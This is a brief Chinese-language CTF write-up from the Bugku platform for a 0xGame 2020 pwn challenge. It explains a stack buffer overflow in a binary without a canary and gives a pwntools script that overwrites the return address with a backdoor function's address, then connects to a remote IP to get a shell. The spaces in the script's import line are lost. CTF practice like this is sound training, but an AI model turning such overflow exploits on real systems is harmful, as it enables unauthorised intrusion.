0xGame 2020 Writeup - Bugku CTF平台

投稿赚金币

0xGame 2020

雾島风起時 2026-06-12 10:31:55 21 0

没开金丝雀，`read`函数读取大小为 64 字节

变量`s`距离`r`处是`0x28`个字节

后门函数地址是`0x0401162`

```python

frompwnimport*

p = process('./main')

p = remote('49.232.142.230',11228)

p.sendafter("?",b'A'*0x28+ p64(0x401162))

p.interactive()

```

作者：雾島风起時

49

提交

3

收入

相关WriteUP

overflow2

***收费WriteUP请购买后查看,VIP用户可免费查看***
- PWN
- 5年前
canary

***收费WriteUP请购买后查看,VIP用户可免费查看***
- PWN
- 5年前
pwn6 格式化字符串漏洞

***收费WriteUP请购买后查看,VIP用户可免费查看***
- PWN
- 5年前
pwn07

***收费WriteUP请购买后查看,VIP用户可免费查看***
- PWN
- 5年前
PWN2

***收费WriteUP请购买后查看,VIP用户可免费查看***
- PWN
- 5年前

问题反馈